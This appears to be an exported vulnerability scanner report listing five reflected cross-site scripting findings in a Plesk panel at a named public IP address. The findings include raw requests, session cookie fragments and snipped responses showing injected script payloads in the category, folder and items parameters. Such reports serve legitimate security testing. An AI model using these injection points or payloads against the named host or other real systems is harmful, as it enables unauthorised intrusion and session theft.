1. Cross-site scripting (reflected)
1.1. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]
1.2. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]
1.3. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]
1.4. http://174.122.23.218:8880/smb/file/copy [items%5B0%5D parameter]
1.5. http://174.122.23.218:8880/smb/file/index/type/external/ [folder parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://174.122.23.218 |
Path: | /smb/app/available/id |
GET /smb/app/available/id Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: 174.122.23.218:8880 Cookie: user=54a8ad2443247fe |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.6 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 01:31:01 GMT Connection: close Content-Length: 15550 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> ...[SNIP]... </script>b84df<script>alert(1)< details: null, resizeCallback: "Smb.Views.Apps }); }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://174.122.23.218 |
Path: | /smb/app/available/id |
GET /smb/app/available/id Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: 174.122.23.218:8880 Cookie: user=54a8ad2443247fe |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.6 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 01:30:57 GMT Connection: close Content-Length: 15521 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> ...[SNIP]... t to try it.","marketplaceMoreInfo baseUrl: '/smb', category: '819d9</script><script details: null, resizeCallback: "Smb.Views.Apps }); }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://174.122.23.218 |
Path: | /smb/app/available/id |
GET /smb/app/available/id Host: 174.122.23.218:8880 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://174.122.23.218 Cookie: do-not-show-getting |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.6 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 01:29:53 GMT Connection: close Content-Length: 15519 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> ...[SNIP]... aceMoreInfo":"For more information, visit %%link%%.","marketpl baseUrl: '/smb', category: 'Web/Content management.de641</script>f5838bd3d85', details: null, resizeCallback: "Smb.Views.Apps }); }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://174.122.23.218 |
Path: | /smb/file/copy |
GET /smb/file/copy?type Host: 174.122.23.218:8880 Proxy-Connection: keep-alive Referer: http://174.122.23.218 Origin: http://174.122.23.218 X-Prototype-Version: 1.6.1_rc3 X-Requested-With: XMLHttpRequest Accept: text/javascript, text/html, application/xml, text/xml, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: show-getting-started |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.6 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 04:36:39 GMT Connection: close Content-Length: 238 {"status":"ERROR", |
Severity: | High |
Confidence: | Certain |
Host: | http://174.122.23.218 |
Path: | /smb/file/index/type |
GET /smb/file/index/type Host: 174.122.23.218:8880 Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: show-getting-started |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.6 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 04:14:33 GMT Connection: close Content-Length: 49586 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <head> ...[SNIP]... st-data', searchable: false, pageable: false, operationsTag: 'div', operationsClass: 'objects-toolbar clearfix', actionsClass: '', currentFolder: '3a008</script><script storageType: 'external', storageUrl: 'http://plesk.cloudscan loadingTitle: 'Please wait. Loading...', locale: {"noEntriesFound":"No files ye ...[SNIP]... |